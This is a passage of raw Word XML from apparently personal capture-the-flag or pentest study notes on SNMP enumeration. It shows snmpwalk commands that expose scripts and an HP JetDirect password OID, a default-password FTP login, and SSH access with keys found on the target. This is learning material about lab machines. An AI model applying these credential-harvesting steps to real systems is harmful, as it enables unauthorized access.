          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 1 -c public 192.168.220.149 NET-SNMP-EXTEND-MIB::nsExtendObjects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This finds the custom scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the output, you need these two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65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NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: /home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65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NET-SNMP-EXTENDOutLine."RESET" = STRING: Resetting password of kiero to the default value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This basically means whenever we run /home/john/RESET_PASSWD we reset password of kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003173">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So, we now know that kiero has a default password. So I just searched up "kiero default password" in case kiero is some type of application, and it turns it is! And the default password is "kiero"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003174">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So, I tried kiero:kiero for FTP and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003175">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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ftp kiero@192.168.220.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003176">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALSO, look at the hostname guys! It's legit kiero. Once we saw kiero, we should know it had to do something with this. Always use the hostname as a hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003178">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And inside were 2 private SSH keys, and one public SSH key!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>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1219200" cy="571500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="279" name="image271.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image271.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1094"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1219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317A">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I then tried both private keys against kiero, but they didn't work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317B">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I then tried them against john (the other username seen in the SNMP output), and I got this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>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397500" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="149" name="image152.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image152.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1095"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53975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317D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This meant that the permissions of the id_rsa file were not fit for a private key!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317E">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I had forgotten to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> chmod 600</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the private keys! I should always do that!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So I tried again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003181">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>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ssh -i id_rsa john@192.168.220.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003182">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003183">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003184">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003185">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003186">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oyz6ao8k878i" w:id="439"/>
      <w:bookmarkEnd w:id="439"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example (HTB)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003187">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003188">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003189">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want more in-depth SNMP usage, look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antique HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP (Simple Network Management Protocol)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like a communication tool used in networks to monitor and manage devices such as routers, switches, printers, and servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's how it works in simple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What It Does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SNMP helps network administrators check the health of devices, track performance, and even change settings remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Devices (like a printer or router) have an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that stores information about the device (e.g., CPU usage, memory, temperature).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A central system, called an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, asks the devices for this information or sends commands to change their settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003191">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SNMP agent responds with the data or applies the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003192">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get password from HP JetDirect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 2c -c public &lt;IP&gt; .1.3.6.1.4.1.11.2.3.9.1.1.13.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003194">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003195">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will get hex values as such</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003196">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109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3197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to copy and paste it into a text editor to remove the unnecessary new lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003198">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003199">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import binascii</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
